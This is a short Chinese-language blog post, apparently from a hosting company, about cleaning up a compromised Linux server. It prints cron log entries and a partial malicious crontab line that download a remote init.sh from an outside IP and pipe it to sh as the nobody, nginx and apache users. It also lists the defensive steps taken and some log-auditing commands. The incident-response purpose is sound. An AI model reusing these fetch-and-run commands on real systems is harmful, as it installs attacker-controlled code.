大橙子网站建设,新征程启航
为企业提供网站建设、域名注册、服务器等服务
现象:
安装成功了
创新互联主要从事成都做网站、成都网站建设、网页设计、企业做网站、公司建网站等业务。立足成都服务山阳,十年网站建设经验,价格优惠、服务专业,欢迎来电咨询建站服务:028-86922220
但是没多久又进来了
而且至今登录到系统来了
[root@izd7oc0a0u64q75bim8bu8z ~]# tail /var/log/cron
\Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cd) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cd) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z crond[3209]: (cur) ERROR (getpwnam() failed)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5724]: (root) CMD (echo 111 >> /home/test.txt)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5723]: (nobody) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5726]: (nginx) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:01 izd7oc0a0u64q75bim8bu8z CROND[5725]: (apache) CMD (cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh)
Oct 23 00:24:02 izd7oc0a0u64q75bim8bu8z CROND[5720]: (nginx) MAIL (mailed 32 bytes of output but got status 0x004b#012)
Oct 23 00:24:02 izd7oc0a0u64q75bim8bu8z CROND[5718]: (nobody) MAIL (mailed 32 byte
[root@izd7oc0a0u64q75bim8bu8z tmp]# cat /etc/crontab
/13 root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to
每分钟 nobody nginx apache用户 执行一次 下载脚本运行
干掉这个脚本,然后停止了crond服务 在var/log/cronrizhikli日志里面就没有异常下载脚本
还有这个异常
发现这里也有用户
打开crontab就一直在下载一分钟执行一次
guoran果断删了 apache 和nobody 只剩下nginx一个在下载 但是 crontab -l也没发现啥异常
做最后终于找到恶意用户位置
直接全部删掉只留下root 最后恢复正常了
以后要重点关注登录系统用户情况
more /var/log/secure |grep Accepted
查询登录频繁用户
awk '/Failed password/ {print $(NF-3)}' /var/log/secure |sort -n |uniq -c|sort -n |tail